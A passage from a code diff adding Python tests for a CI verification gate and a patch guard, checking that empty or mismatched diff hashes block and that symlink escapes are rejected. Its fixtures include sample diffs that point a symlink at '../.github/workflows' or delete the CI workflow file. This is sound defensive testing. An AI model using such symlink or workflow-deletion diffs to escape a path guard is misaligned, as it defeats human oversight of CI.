# A real ledger hash but an EMPTY ci_verified hash must not match (the empty
# string is not the recomputed sha).
diff = _diff_for("a.py")
h = _ledger_hash(diff)
assert verify_diff_hash(diff, ledger_hash=h, ci_verified_hash="") is False
def test_hash_ci_verified_must_also_match() -> None:
diff = _diff_for("a.py")
h = _ledger_hash(diff)
@ -293,6 +308,34 @@ def test_gate_ignores_patch_written_success_field() -> None:
assert result.decision is GateDecision.FAIL
def test_gate_blocks_on_empty_ledger_hash() -> None:
# Fail-closed: an empty ledger hash binds to nothing -> BLOCK, never a pass,
# even with an authenticated CI success.
diff = _diff_for("src/foo.py")
result = evaluate_ci_gate(
candidate_diff=diff,
ledger_hash="",
ci_result=_good_ci("run-1", diff, "success"),
expected_run_id="run-1",
)
assert result.decision is GateDecision.BLOCK
assert any("hash" in r for r in result.reasons)
def test_gate_blocks_on_empty_ci_diff_hash() -> None:
# An empty CI-verified diff_hash must not silently pass the integrity check.
diff = _diff_for("src/foo.py")
ci = _good_ci("run-1", diff, "success")
ci["diff_hash"] = ""
result = evaluate_ci_gate(
candidate_diff=diff,
ledger_hash=_ledger_hash(diff),
ci_result=ci,
expected_run_id="run-1",
)
assert result.decision is GateDecision.BLOCK
def test_gate_blocks_when_ci_diff_hash_mismatch() -> None:
# CI verified a different diff than the ledger recorded -> BLOCK.
diff = _diff_for("src/foo.py")

View file

@ -84,6 +84,15 @@ SYMLINK = (
"diff --git a/src/link b/src/link\nnew file mode 120000\n"
"--- /dev/null\n+++ b/src/link\n@@ -0,0 +1 @@\n+../.github/workflows\n"
)
# A diff that CHANGES an existing regular file into a symlink (mode 100644 ->
# 120000). The escape vector is the same: the link target redirects later writes
# into a denied path that textual matching cannot see. Must be rejected too.
SYMLINK_MODE_CHANGE = (
"diff --git a/src/existing b/src/existing\n"
"old mode 100644\nnew mode 120000\n"
"--- a/src/existing\n+++ b/src/existing\n@@ -1 +1 @@\n-regular contents\n"
"+../.github/workflows\n"
)
WORKFLOW_DELETE = (
"diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml\n"
"deleted file mode 100644\n--- a/.github/workflows/ci.yml\n+++ /dev/null\n"
@ -123,6 +132,12 @@ def test_symlink_addition_is_rejected(guard_script: Path, tmp_path: Path) -> Non
assert _run_guard(guard_script, tmp_path, SYMLINK, "src/**") == 7
def test_symlink_mode_change_is_rejected(guard_script: Path, tmp_path: Path) -> None:
# A regular file FLIPPED to a symlink (mode 120000) is the same escape vector
# and must also be rejected (exit 7), not just brand-new symlinks.
assert _run_guard(guard_script, tmp_path, SYMLINK_MODE_CHANGE, "src/**") == 7
def test_non_utf8_diff_fails_closed(guard_script: Path, tmp_path: Path) -> None:
assert _run_guard(guard_script, tmp_path, NON_UTF8, "src/**") == 8